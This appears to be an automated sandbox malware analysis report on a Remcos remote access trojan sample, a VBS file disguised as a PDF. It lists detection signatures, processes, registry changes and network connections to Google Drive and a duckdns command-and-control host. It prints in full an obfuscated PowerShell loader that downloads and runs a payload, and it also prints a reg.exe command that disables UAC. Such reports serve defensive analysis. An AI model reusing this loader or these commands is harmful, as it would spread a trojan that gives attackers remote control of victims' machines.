Malware Analysis Report

2024-12-07 03:21

Sample ID 241112-3xtlnawqcq
Target 12112024_2353_Document BT24�pdf.vbs.zip
SHA256 eb88df06fa2f93f3615a04a593ff0c88098a6e4a9d0063dc3cfbd8931f0e625e
Tags
remcos remotehost discovery evasion rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

eb88df06fa2f93f3615a04a593ff0c88098a6e4a9d0063dc3cfbd8931f0e625e

Threat Level: Known bad

The file 12112024_2353_Document BT24�pdf.vbs.zip was found to be: Known bad.

Malicious Activity Summary

remcos remotehost discovery evasion rat trojan

UAC bypass

Remcos family

Remcos

Blocklisted process makes network request

Checks computer location settings

Network Service Discovery

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-12 23:54

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-12 23:54

Reported

2024-11-12 23:59

Platform

win10v2004-20241007-en

Max time kernel

300s

Max time network

299s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document BT24·pdf.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document BT24·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#electrophotometry Shadoofs Kannibalismen Unarboured Sknserklringens Aequian #><#Encipher Gangliecelles Beordret Flatterous tetracene Rvturene Flyveres #>$Recrowns='consultor';function Outdoor($Doundake){If ($host.DebuggerEnabled) {$limosella++;$pappiferous=$Doundake.'Length' - $limosella} for ( $presubordination=4;$presubordination -lt $pappiferous;$presubordination+=5){$Kloroformens84=$presubordination;$Spicae+=$Doundake[$presubordination]}$Spicae}function Correality69($Dissiderende){ .($Fejltest) ($Dissiderende)}$Kattehjemmet=Outdoor 'NoninCleieSalptUnin.HomoWSk.lEal,eb andC,kolLSporI kinENicknG ugtG no ';$Scorpiurus=Outdoor ' utoMSe.loUhyrzAfbriUnsol onbl VrdaI vi/ nv ';$Politicness=Outdoor 'MogoTDendlBoplsNo i1Affo2obsk ';$prveperiode=' Mit[SporN KalELiveT L g. Rads U bEErogr Undv BrnIShanc Cone ouP El,oTilbi ParNTovat EleMInteAFor.nAfreA NonGC rreE loR ymm]Blue:G it: NizSHjopE igncAndouJ anrmusiisel TS veyTor P epiROveroBonbtF amoVinicB edObaktlApro=R dd$ ForpBeduoRadilF.asiAenetC ari TheCLi dn OmfEFr ms GedsBort ';$Scorpiurus+=Outdoor 'Unde5Ails.Plat0St,n Pemm( oncWUn uiSeminE sedCarboYammwenepsOppo UpchNGuveTbo,i W l1 ans0 f l. Ern0Impe;Vare nonpW PariFejlnt,tr6Br.t4Stil; afs AfskxIndi6 E,t4dumm; Lun Spi rLnfrvperp:erhv1Plag3 d,d1Pror.Ki e0fyld)Brne TactGjagte Sjlc Ar k Taxo.icr/ cou2,vin0 ,il1Kalc0C,um0 Brd1Rubu0Enke1Kims OverFSor.iPa.arSk.neSkorfFlooounflx Oth/L,pi1Prim3maeg1 alk.Unde0Dobb ';$Deklasseringers=Outdoor ' niuFitnSDiffeHellrSlyn- So a hirgGaliE Ca nMan T ft ';$Informalities=Outdoor 'Vir h A ttFor tPantpErhvssin.:Irre/Vint/NonedGerarF siiRe hv one Mor. Thig esodatooA,digLuftl ManeDeso.H,rrc GraoKarimB vi/Misruvildc ffa? So eVigixLaugpSrmro O.er ammtLabi= MegdDisroCianwIsranNon lcrapoFriha esidOpla& Tori Ov dFi.g= E o1colonsa,d9 ordlKundl P vn FeslStimzunsteCa ioP ep0EfteL TilS Opl0,aeloF av9Matf8 fl,P artJBirtLBugb1Esse-,gglRNiog1F,nkQLadejStveXBlrefTittzBegreErstObesi2Don,_Ma i ';$Vidneafhringernes=Outdoor ' Sp,>Goek ';$Fejltest=Outdoor 'SkumICa seStj xun o ';$Zygal='Backupfil';$Unheretical='\Nedrykke.Fon';Correality69 (Outdoor 'Gram$BremGYel.lGtepoTrihb rgeaPrioLOutr:AcroSMet kPotay C cTFirmLrateELev RSnak=Mpso$TaphEO,ypnT buv Sam:St aANglePNdj pParrDBaita KantByggAVsel+ Rep$ RevUOctonPrephBlanEUrger,pice enTPacii SagCDemeaObo,lDe,i ');Correality69 (Outdoor 'Kamb$ LnsGFiraLQu,doNickBInmeAAn ilS am:UnenuFlleDRad.SOv rTBestYTa,kK Pagn FanidessnEndogAsynsEkstOCe tmDiskrPre a ,adaLnind eleV spT.kspSNeat=anis$BogaICedenSolvFBar,oN,naRPl em rigaSufilTrieiSte TBov iWardENoddS.dda.CevisN rdp sselSkanI verT ,ri( ,et$MarkVMastiLob,d C.rn SpieraadA Fo.FCha hP,rarvrn.iVrnenNausGSenteProvrCas.NAng,E SynSRetu)Yird ');Correality69 (Outdoor $prveperiode);$Informalities=$Udstykningsomraadets[0];$aarvaagen=(Outdoor 'Macr$,retGLendlHumbO UnaBm scAbronlBi d:Hstea Me LAngrTSjakeThisrGaddN Co,aS emrF,lmiOboea Voc=DynenBilfE SunWAtri-TummOCe.lb LamJK,imESitocN ddTR to Abmhs Pery ,lis KonTProtE,eriMP iu.,oop$Uns.kJuleaH altScooTD.arE FraHT neJP ole Demm Pr,mHad EBi ntGuld ');Correality69 ($aarvaagen);Correality69 (Outdoor 'Hypn$Sk.laKommlQue tSexteLapir ornNedgaHip.rMa si UndaNrhe.SomaH,edoeFun,aRobad D,ne nterIncos Gue[Anim$ SanDrod eGrilkMa rlFrihaOp as FibsCoale T or uti ytnS.rigNoneeAxiarPremsFae ] Sla=F nd$FalsS Valc C moO.hor Es.pSkoviAfs uOenir riguKul sTage ');$Konversabel=Outdoor 'Un e$CollaSi,dlA det PreeTangrWo,kn Orda CourTi,bi Cluasneg. C sDTeoro FilwT rtn aml rctoWeataCassd MisFhandiinddlpandeRetr( egr$ rofIIndin latf CheoSickrVarpmolieaU jvlPro iC mmtMadeiLaureRos.sKrei,Unmo$ SnaASprec SmoiFlagd ConyDeni).eks ';$Acidy=$Skytler;Correality69 (Outdoor 'Wist$h,etGDuruLFor o ontB CowA,mpiLFrow:RullsIsohMshifaLuftADaabEDozeLIlanE eklKVejbtVisur U eoMagnnTjreIlis KUnde=Li n(D nsTHeadEGletsEye tFlin-NugaPWrotAOpvetregiHVogi Rud $.jtia apsc onoi PildDkfaymem )Ejef ');while (!$Smaaelektronik) {Correality69 (Outdoor 'Kegl$yodegKalkl ModoSkrtbAbceaStril Reg:SideF asso turr SchbKikkr HepuKahagDecoeOp,utVi dsNerv=suba$RolltBedrrEr ku FroeAbso ') ;Correality69 $Konversabel;Correality69 (Outdoor ' ResSSeritNeurALoc rSoret Sky-GlumSY,llL RocEAlleERer P Pom Unse4Over ');Correality69 (Outdoor 'Ser $ BlugNippL ObjOSyvmbReplaUndelBet.: eleS.oremNe,va Co aUndieTr eLKaryEAllak AdsTBoo RDra,oJa snreceIFritk Fau= Red( Witt SkyESchiSRoteT,rov-Se iPFa.oaVa itPo uh .er ua$milsAbrugC iteILredD TykyDrom)Udv ') ;Correality69 (Outdoor 'Rens$SnregS,ntLRdnsOBa gbUnknA ForLSo i:QuadmBjerOHippM NoseNereNle,sTSt eS Ple=R nn$AcergbuttLFid,ONegaBVulkASpisl Dkk:DartB.culL FigA To aSkaimGodfEthinj Ants La e Do +Op,r+ moo%Dru $ReseUeft dRefoSZaratTr,fYStylk SylnsklriTrbeNB ddgMellsC siobackMB flrUns aGabba ityDGuv,e ,nstVrkeSbesl. F rCBronoTageuSufinPagatGenn ') ;$Informalities=$Udstykningsomraadets[$Moments]}$Landboforeningerne=309803;$presubordinationnterschool=30529;Correality69 (Outdoor 'Whit$SainG eoL reaODisoBTempa.etoLKomm:ResebUndelFriliGa.rKAr mkBurme cieSerem tn=taxl Ba.ig IndE a,st ism- c,nc JouOAmbinBedsTsangEnedknFuppTAnal C.ec$,omfA,rocCalu iSystDAb rYMidd ');Correality69 (Outdoor 'Misc$Slukg ForlSprooBearb M daLaurlLayo:S ksCnonphS.mirUndeoCenon ga oAutomSgeraOzons Af.tEsmai Nskx cyl ,ono=Jdek mil[BaraS emiy .yrsGedetRyoteEngamU kn. Li.CstupoBli n In vDem eSailrF.istRfct]Piti:Wi.n: moeFCro r eosoSerimMandBJi gaUnsmsFor,eOpo 6Kapi4ExopSAflytTramr,ongiFor.nUnwrgUnde(Tu,i$ oveBKololAfskiProokHarekA pleKarasSpi.)Numi ');Correality69 (Outdoor 'ryma$ReacgSansL RgeOMystBUnfeA dbulUaf :Fr ts PigIPropDnonrEWeanTSpirAPraglUtyslForseLystR ovvKDo sePoleNSeksESvigr,legNMorgEMechSRepa4 Aar0Vini Sted=Fern ,ngo[ChassTeleyL jrs BroTAyene ritmRe.d. Ta,tt.iaEMundXC.pit D m.Cl geGlimNRotecHalvOHanddDowni FreNAffag orm] edl: tri:KonfAgla.sFul cIndpIViv IEnam.Dokug S gETas tEmirsHydrTExtrR A li ronOnomgAm t(Tuds$S avC aldhOmbrR UdvO CalNServO rfemY,ntAlinasMetaT ,ili Am xTo t) su ');Correality69 (Outdoor 'Vel $ makgE.silShojOUnsebSal A.rcalTrne:HoppYAnt OGarnnFrdin DetaOver1 Dif7Bien0 bib=.lve$Mis.SNo oiM.dddEkseeSkd,T Zw aKa slKompLBodoeUnivRU lbkTaeneHypoNPoineTsu rmen nMurrEAnsgSO dr4Nyan0tric.jernsAnthuFo dBfrynStweeT S.ar Rv,i AppnResoG Und(P,ln$RisalBespaEle.NVrdid,gnobFiltOBondfPenuo RevRSli.e KoaNTremIU,deN T.kg D,pEKierR By nVelse,ppe, rna$Elo,PMetaR Li e ,laSgra UautobSabboDesiR ahDSlabIfangnPartahagatWhipI AmeOFowlnTabin ki THaanE BesRAnkeS HilcSeptHGruno AvaOPyroLRe l)T ng ');Correality69 $Yonna170;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#electrophotometry Shadoofs Kannibalismen Unarboured Sknserklringens Aequian #><#Encipher Gangliecelles Beordret Flatterous tetracene Rvturene Flyveres #>$Recrowns='consultor';function Outdoor($Doundake){If ($host.DebuggerEnabled) {$limosella++;$pappiferous=$Doundake.'Length' - $limosella} for ( $presubordination=4;$presubordination -lt $pappiferous;$presubordination+=5){$Kloroformens84=$presubordination;$Spicae+=$Doundake[$presubordination]}$Spicae}function Correality69($Dissiderende){ .($Fejltest) ($Dissiderende)}$Kattehjemmet=Outdoor 'NoninCleieSalptUnin.HomoWSk.lEal,eb andC,kolLSporI kinENicknG ugtG no ';$Scorpiurus=Outdoor ' utoMSe.loUhyrzAfbriUnsol onbl VrdaI vi/ nv ';$Politicness=Outdoor 'MogoTDendlBoplsNo i1Affo2obsk ';$prveperiode=' Mit[SporN KalELiveT L g. Rads U bEErogr Undv BrnIShanc Cone ouP El,oTilbi ParNTovat EleMInteAFor.nAfreA NonGC rreE loR ymm]Blue:G it: NizSHjopE igncAndouJ anrmusiisel TS veyTor P epiROveroBonbtF amoVinicB edObaktlApro=R dd$ ForpBeduoRadilF.asiAenetC ari TheCLi dn OmfEFr ms GedsBort ';$Scorpiurus+=Outdoor 'Unde5Ails.Plat0St,n Pemm( oncWUn uiSeminE sedCarboYammwenepsOppo UpchNGuveTbo,i W l1 ans0 f l. Ern0Impe;Vare nonpW PariFejlnt,tr6Br.t4Stil; afs AfskxIndi6 E,t4dumm; Lun Spi rLnfrvperp:erhv1Plag3 d,d1Pror.Ki e0fyld)Brne TactGjagte Sjlc Ar k Taxo.icr/ cou2,vin0 ,il1Kalc0C,um0 Brd1Rubu0Enke1Kims OverFSor.iPa.arSk.neSkorfFlooounflx Oth/L,pi1Prim3maeg1 alk.Unde0Dobb ';$Deklasseringers=Outdoor ' niuFitnSDiffeHellrSlyn- So a hirgGaliE Ca nMan T ft ';$Informalities=Outdoor 'Vir h A ttFor tPantpErhvssin.:Irre/Vint/NonedGerarF siiRe hv one Mor. Thig esodatooA,digLuftl ManeDeso.H,rrc GraoKarimB vi/Misruvildc ffa? So eVigixLaugpSrmro O.er ammtLabi= MegdDisroCianwIsranNon lcrapoFriha esidOpla& Tori Ov dFi.g= E o1colonsa,d9 ordlKundl P vn FeslStimzunsteCa ioP ep0EfteL TilS Opl0,aeloF av9Matf8 fl,P artJBirtLBugb1Esse-,gglRNiog1F,nkQLadejStveXBlrefTittzBegreErstObesi2Don,_Ma i ';$Vidneafhringernes=Outdoor ' Sp,>Goek ';$Fejltest=Outdoor 'SkumICa seStj xun o ';$Zygal='Backupfil';$Unheretical='\Nedrykke.Fon';Correality69 (Outdoor 'Gram$BremGYel.lGtepoTrihb rgeaPrioLOutr:AcroSMet kPotay C cTFirmLrateELev RSnak=Mpso$TaphEO,ypnT buv Sam:St aANglePNdj pParrDBaita KantByggAVsel+ Rep$ RevUOctonPrephBlanEUrger,pice enTPacii SagCDemeaObo,lDe,i ');Correality69 (Outdoor 'Kamb$ LnsGFiraLQu,doNickBInmeAAn ilS am:UnenuFlleDRad.SOv rTBestYTa,kK Pagn FanidessnEndogAsynsEkstOCe tmDiskrPre a ,adaLnind eleV spT.kspSNeat=anis$BogaICedenSolvFBar,oN,naRPl em rigaSufilTrieiSte TBov iWardENoddS.dda.CevisN rdp sselSkanI verT ,ri( ,et$MarkVMastiLob,d C.rn SpieraadA Fo.FCha hP,rarvrn.iVrnenNausGSenteProvrCas.NAng,E SynSRetu)Yird ');Correality69 (Outdoor $prveperiode);$Informalities=$Udstykningsomraadets[0];$aarvaagen=(Outdoor 'Macr$,retGLendlHumbO UnaBm scAbronlBi d:Hstea Me LAngrTSjakeThisrGaddN Co,aS emrF,lmiOboea Voc=DynenBilfE SunWAtri-TummOCe.lb LamJK,imESitocN ddTR to Abmhs Pery ,lis KonTProtE,eriMP iu.,oop$Uns.kJuleaH altScooTD.arE FraHT neJP ole Demm Pr,mHad EBi ntGuld ');Correality69 ($aarvaagen);Correality69 (Outdoor 'Hypn$Sk.laKommlQue tSexteLapir ornNedgaHip.rMa si UndaNrhe.SomaH,edoeFun,aRobad D,ne nterIncos Gue[Anim$ SanDrod eGrilkMa rlFrihaOp as FibsCoale T or uti ytnS.rigNoneeAxiarPremsFae ] Sla=F nd$FalsS Valc C moO.hor Es.pSkoviAfs uOenir riguKul sTage ');$Konversabel=Outdoor 'Un e$CollaSi,dlA det PreeTangrWo,kn Orda CourTi,bi Cluasneg. C sDTeoro FilwT rtn aml rctoWeataCassd MisFhandiinddlpandeRetr( egr$ rofIIndin latf CheoSickrVarpmolieaU jvlPro iC mmtMadeiLaureRos.sKrei,Unmo$ SnaASprec SmoiFlagd ConyDeni).eks ';$Acidy=$Skytler;Correality69 (Outdoor 'Wist$h,etGDuruLFor o ontB CowA,mpiLFrow:RullsIsohMshifaLuftADaabEDozeLIlanE eklKVejbtVisur U eoMagnnTjreIlis KUnde=Li n(D nsTHeadEGletsEye tFlin-NugaPWrotAOpvetregiHVogi Rud $.jtia apsc onoi PildDkfaymem )Ejef ');while (!$Smaaelektronik) {Correality69 (Outdoor 'Kegl$yodegKalkl ModoSkrtbAbceaStril Reg:SideF asso turr SchbKikkr HepuKahagDecoeOp,utVi dsNerv=suba$RolltBedrrEr ku FroeAbso ') ;Correality69 $Konversabel;Correality69 (Outdoor ' ResSSeritNeurALoc rSoret Sky-GlumSY,llL RocEAlleERer P Pom Unse4Over ');Correality69 (Outdoor 'Ser $ BlugNippL ObjOSyvmbReplaUndelBet.: eleS.oremNe,va Co aUndieTr eLKaryEAllak AdsTBoo RDra,oJa snreceIFritk Fau= Red( Witt SkyESchiSRoteT,rov-Se iPFa.oaVa itPo uh .er ua$milsAbrugC iteILredD TykyDrom)Udv ') ;Correality69 (Outdoor 'Rens$SnregS,ntLRdnsOBa gbUnknA ForLSo i:QuadmBjerOHippM NoseNereNle,sTSt eS Ple=R nn$AcergbuttLFid,ONegaBVulkASpisl Dkk:DartB.culL FigA To aSkaimGodfEthinj Ants La e Do +Op,r+ moo%Dru $ReseUeft dRefoSZaratTr,fYStylk SylnsklriTrbeNB ddgMellsC siobackMB flrUns aGabba ityDGuv,e ,nstVrkeSbesl. F rCBronoTageuSufinPagatGenn ') ;$Informalities=$Udstykningsomraadets[$Moments]}$Landboforeningerne=309803;$presubordinationnterschool=30529;Correality69 (Outdoor 'Whit$SainG eoL reaODisoBTempa.etoLKomm:ResebUndelFriliGa.rKAr mkBurme cieSerem tn=taxl Ba.ig IndE a,st ism- c,nc JouOAmbinBedsTsangEnedknFuppTAnal C.ec$,omfA,rocCalu iSystDAb rYMidd ');Correality69 (Outdoor 'Misc$Slukg ForlSprooBearb M daLaurlLayo:S ksCnonphS.mirUndeoCenon ga oAutomSgeraOzons Af.tEsmai Nskx cyl ,ono=Jdek mil[BaraS emiy .yrsGedetRyoteEngamU kn. Li.CstupoBli n In vDem eSailrF.istRfct]Piti:Wi.n: moeFCro r eosoSerimMandBJi gaUnsmsFor,eOpo 6Kapi4ExopSAflytTramr,ongiFor.nUnwrgUnde(Tu,i$ oveBKololAfskiProokHarekA pleKarasSpi.)Numi ');Correality69 (Outdoor 'ryma$ReacgSansL RgeOMystBUnfeA dbulUaf :Fr ts PigIPropDnonrEWeanTSpirAPraglUtyslForseLystR ovvKDo sePoleNSeksESvigr,legNMorgEMechSRepa4 Aar0Vini Sted=Fern ,ngo[ChassTeleyL jrs BroTAyene ritmRe.d. Ta,tt.iaEMundXC.pit D m.Cl geGlimNRotecHalvOHanddDowni FreNAffag orm] edl: tri:KonfAgla.sFul cIndpIViv IEnam.Dokug S gETas tEmirsHydrTExtrR A li ronOnomgAm t(Tuds$S avC aldhOmbrR UdvO CalNServO rfemY,ntAlinasMetaT ,ili Am xTo t) su ');Correality69 (Outdoor 'Vel $ makgE.silShojOUnsebSal A.rcalTrne:HoppYAnt OGarnnFrdin DetaOver1 Dif7Bien0 bib=.lve$Mis.SNo oiM.dddEkseeSkd,T Zw aKa slKompLBodoeUnivRU lbkTaeneHypoNPoineTsu rmen nMurrEAnsgSO dr4Nyan0tric.jernsAnthuFo dBfrynStweeT S.ar Rv,i AppnResoG Und(P,ln$RisalBespaEle.NVrdid,gnobFiltOBondfPenuo RevRSli.e KoaNTremIU,deN T.kg D,pEKierR By nVelse,ppe, rna$Elo,PMetaR Li e ,laSgra UautobSabboDesiR ahDSlabIfangnPartahagatWhipI AmeOFowlnTabin ki THaanE BesRAnkeS HilcSeptHGruno AvaOPyroLRe l)T ng ');Correality69 $Yonna170;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 dvlqrd8dhs.duckdns.org udp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 8.8.8.8:53 26.69.169.192.in-addr.arpa udp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
US 192.169.69.26:46063 dvlqrd8dhs.duckdns.org tcp
